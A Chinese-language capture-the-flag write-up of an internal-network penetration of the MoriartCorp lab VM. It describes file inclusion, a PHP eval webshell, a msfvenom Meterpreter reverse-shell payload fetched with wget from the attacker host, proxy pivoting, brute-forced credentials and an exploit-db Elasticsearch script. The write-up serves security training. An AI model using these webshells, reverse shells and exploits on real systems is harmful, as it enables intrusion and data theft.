MoriartCorpCTF靶场渗透测试

MoriartCorpCTF靶场 渗透测试报告

 

项目概述

渗透测试目的

渗透测试范围

渗透测试时间

渗透测试环境

渗透测试人员

渗透测试方法

渗透测试流程

渗透测试方法与内容

渗透测试结果汇总

项目概述

渗透测试目的

拿到关键信息flag.txt

渗透测试范围

本次渗透测试范围为本地，具体如下：

表1-1：渗透测试对象

序号	系统名称	网站地址	内外网
1	MoriartCorp	http://192.168.22.131	内网
2	MoriartCorp	172.17.0.0/24	内网

渗透测试时间

2023年11月1日 下午2:30-晚上7:00

渗透测试环境

在本地开展内网的vmware虚拟机中渗透测试。

渗透测试人员

TYR2

渗透测试方法

渗透测试流程

渗透测试方法与内容

• 信息收集
• 端口扫描

       1.1主机发现端口扫描

        

 发现131主机，22端口和8000端口9000端口开启

1.2访问后需要输入flag{start}开始

1.3访问9000端口后是一个登录界面

        

        

    测试了一下万能密码，无法登录，试试扫描一下后台

1.3目录扫描试试

        

        

        查看了一下没有什么可以利用的

1.4这里告诉我们80端口开启了

        

1.5访问一下有两篇博客

        第二篇博客说他们属于内网，猜测可能需要搭建代理

        发现网站url

        

猜测可能存在文件包含

1.6对80端口进行目录扫描

        

• 漏洞利用
• 1.文件包含漏洞验证与利用

1.1还是使用bp抓包枚举一下

     

•  经过测试，发现能够进行文件包含-并且发现1_flag.txt

    

拿到1_flag.txt   flag{the_game_is_on}

• 3.填入之前的可以提交flag的网页--来到新的页面

        

• 4.直接翻译为

    

• 5.猜测这里需要我们搭建代理
• 6.先使用远程文件包含漏洞拿到shell

在kali机上创建一个内容为：<?php @eval($_REQUEST['A']); ?> 的1.txt文件

 开启临时服务器

 使用远程包含1.txt文件的方式连接蚁剑

• 7.在kali上生成linux木马elf文件，反弹ip写成kali机端口9999

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.21.2 LPORT=9999 -f elf > mshell.elf

• 8.使用wget远程下载到靶机

 wget http://192.168.21.2/mshell.elf

• 9.为其添加可执行权限

  

• 10.执行mshell.elf文件-kali机一并开起监听

取得meterpreter

   

• 11.这个时候要添加路由，前面有提示

   

• 12.添加

  

• 13.使用模块并设置参数

  

其中run如果持续不结束就需要修改/etc/proxychain4a.conf 文件，最下面端口改成1080

• 14.使用模块扫描80端口

    

• 15.设置端口转发

    

• 16.访问kali的4399端口

 发现是文件上传   

• 17.通过bp的暴力破解，password是password-上传成功  

    

文件保存在192.168.21.2:3366/photo/23/1.php

• 18.连接哥斯拉

  

• 19.再换代理扫描172.17.0.5

        

• 22端口开启
• 20.暴力破解

        

root weapons

• 21.ssh连接进入拿到第三个flag

        

• 22.填入第三个flag，提示叫我们扫以下端口

        

• 23.发现172.17.0.6开启了8000，然后搭建代理访问 

        

• 24.使用给的账号密码登录

        

• 登录成功

    

        

• 25.查看chats发现第四个flag

 Your chat messages are listed below

admin: What did you need and what's your budget?

buyer1: I need to arm around 10 people. Budget is 10,000 USD.

admin: Sounds good. Let me see what I can do.

buyer1: I might buy more, is there a discount?

admin: Yes, we can offer a discount. flag{on_the_move}

admin: Buy within a month and we can take 10% off the original price.

buyer1: Sounds like a deal. Let's meet up and discuss the details.

admin: I will send you a message about my shop

26.告诉我们使用的是一个框架

   Those chat logs provided a lot of evidence.

• The shop mentioned in the chat likely uses a backend database, try to compromise that server. We're pretty sure that Moriarty Corp. is using Elasticsearch.

Once compromised, look for information related to buyers. This is the final piece of evidence that we need to take down Moriarty Corp.

这些聊天记录提供了很多证据。

聊天中提到的商店可能使用了后端数据库，请尝试破坏该服务器。我们非常确定Moriarty Corp.正在使用Elasticsearch。

一旦遭到入侵，请寻找与买家有关的信息。这是我们需要撤下Moriarty Corp.的最后证据。

27.使用kali自带漏洞扫描工具

    

cd /usr/share/exploitdb/exploits/linux/remote

proxychains python 36337.py 172.17.0.7

28.找到最后一个flag

    

渗透测试结果汇总

MoriartCorp靶场是一个内网渗透的典型靶场，对我来说非常具有挑战，如果不借助网络的力量下单独完成100%不可能，其中有很多漏洞：文件包含、文件泄露、系统内核提权等